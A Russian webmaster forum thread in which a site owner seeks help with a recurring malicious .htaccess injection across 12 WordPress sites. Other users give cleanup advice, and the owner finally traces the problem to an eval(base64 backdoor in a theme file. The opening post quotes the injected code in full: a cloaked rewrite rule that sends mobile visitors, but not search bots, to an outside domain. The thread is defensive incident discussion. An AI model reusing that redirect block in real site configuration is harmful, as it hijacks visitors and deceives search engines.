Форум Сайтостроение Безопасность

Вирус через редирект в .htaccess на всех сайтах

S1
На сайте с 30.11.2009
Offline
73
sirdki1
7858

Всем привет!

Уже тут поднималась тема эта, но я все действия проделывал, которые советовали форумчане, поэтому решил создать свою, может кто-то что-то сможет посоветовать.

Итак уже недели 2 в файле .htaccess появляется следующий код:

RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule ^(.*)$ http://gigabitmobi.com/l=32411d1f076c0b4d0356455649545343704c051c1b6d011e120e071e0d46 [L,R=302]

Если его удаляю, то через пару часов он появляется снова. На аккунте 12 сайтов и все заражены. Предпринял я следующее:

  • Проверил комп на вирусы, пару были найдены, удалил...
  • Обновил все сайты, все плагины, оставил только использующиеся темы
  • Скопировал все сайты на локалку и проверил на вирусы, ничего не найдено...
  • Поменял пароли к FTP, всем админкам
  • Поудалял всех пользователей FTP
  • Проверил все сайты через ai-bolit. На всех были найдены 2 одинаковые шелла, которые я удалил

Но все равно этот редирект появляется постоянно. Траф просел уже 2 недели, реально опасаюсь санкций(( Сейчас сайты чистые, код вредоносный не появляется, но редирект есть...

У кого есть еще какие-нибудь мысли? В принципе в том же ai-bolit есть еще некритические замечания, но их всегда на каждый сайт много, сомневаюсь, что что-то из этого является причиной...

Мало ли пригодится, но примеры сайтов на аккаунте: poker-soft.net, seorembo.ru

Хостинг - timeweb (суппорт сказал, что это моя проблема, уяхвимостей с их стороны нет)

Продвижение детских каналов на YouTube (http://worldofvideo.ru/prodvizhenie-detskix-kanalov-na-youtube/) Все о продвижении видео на YouTube (http://worldofvideo.ru/)
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#1
sirdki1:
оставил только использующиеся темы

Так мб там и сидит шелл\бекдор, который айболит не поймал?

Ещё вариант дыры - отдельный скрипт. Сравни по-файлово с оригинальным дистр-ом движка. В своих файлах поищи по расширению чего (не) заливал.

А по домену редиректа в файлах искал?

ЗЫ. ИМХО. Стартпост может служить образцом обращения за помощью в разделе "безопасность".

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
Взлом сайта Взломан сайт на DLE Google security: вирус на
S1
На сайте с 30.11.2009
Offline
73
sirdki1
#2
SeVlad:
Так мб там и сидит шелл\бекдор, который айболит не поймал?

Ещё вариант дыры - отдельный скрипт. Сравни по-файлово с оригинальным дистр-ом движка. В своих файлах поищи по расширению чего (не) заливал.

А по домену редиректа в файлах искал?

ЗЫ. ИМХО. Стартпост может служить образцом обращения за помощью в разделе "безопасность".

Спаси большое за советы. По домену искал редирект, пусто((

А файлы да, сравню, хорошая идея, хотя бы все основные сверю...

R
На сайте с 24.01.2008
Offline
180
Алексей
#3

Ни 1 скрипт вам не даст уверенности, что нет шелла на ваших сайтов. В вашем случае нужно проверять все намного тщательнее.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Vanich
На сайте с 10.07.2007
Offline
165
Vanich
#4

Удалять бяку и на время поисков установить права на заражаемые файлы "только чтение".

Онлайн-консультант для юридических, медицинских, компьютерных, туристических сайтов. Удобно пользователю, прибыльно вебмастеру. (http://webmasters.leadia.ru/?ref=bIoqZIaath) MONKEYWRITE ТЕПЕРЬ БЕСПЛАТНО (https://yadi.sk/d/Hd9mbvyzeMMfp)
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#5
sirdki1:
А файлы да, сравню, хорошая идея, хотя бы все основные сверю...

Я имел ввиду даже не содержание, а состав-даты-объёмы. В любом правильном файлменежере это в пару кликов делается. Хотя можно сразу и по содержанию. Дольше, конечно будет, но это ж не вручную каждый файл сравнивать. Тыц кнопер - и через время получи результат.

Яндекс добавил колдунщик турбо-страниц Google будет строже контролировать Автоматическая оценка качества рекламных
servercraft
На сайте с 03.07.2013
Offline
8
servercraft
#6
sirdki1:

У кого есть еще какие-нибудь мысли?

либо не устранили дыры, либо скорее всего вебшелл не убрали либо хостинговый сервер взломан глобально (очень вряд ли, если это виртуальный хостинг - саппорт был бы завален тикетами).

скорее всего вебшелл не обнаружили, aibolit не панацея, нет сигнатуры в базе - нет обнаружения...

ищите сами, по фразам eval(base, gzinflate, preg_match, $_POST и тд

http://serverсraft.com.ua (http://servercraft.com.ua) настраиваем сервера, удаляем вирусы с сайтов
В рунете обнаружено около Google вебмастерам о запросах Топ выдачи Google по
S1
На сайте с 30.11.2009
Offline
73
sirdki1
#7

Ребята, всем спасибо! Вроде нормально все, уже 20 часов не появляется редирект, хотя раньше после удаления сразу высвечивался.

Что сделал: у меня было подозрение на один сайт, т.к. его купил недавно и было установлено больше 20 плагинов. Начал на нем, как посоветовал SeVlad (за что ему огромнейшее спасибо), сверять основные файлы с дистрибьютивом WP. В теме был найден файл header1.php с началом eval(base64...

Удалил его, еще раз поменял пароль от FTP и вроде бы теперь все гуд:)

Вирус base64_decode во всех Вирус на сайте В Search Console вместо
SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#8
sirdki1:
за что ему огромнейшее спасибо)

И тебе спасибо. За качественно оформленный вопрос (с изучением предмета и проведёнными работами до этого) и за отчёт. Сразу видно, что не в пустоту народ старался помогать.

emariaru
На сайте с 26.10.2010
Offline
73
emariaru
#9

еще иногда помогает -

1. включить логи веб сервера

2. смотреть время и дату изменения файла htaccess

3. смотреть по логам какие файлы запускались именно в это время

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий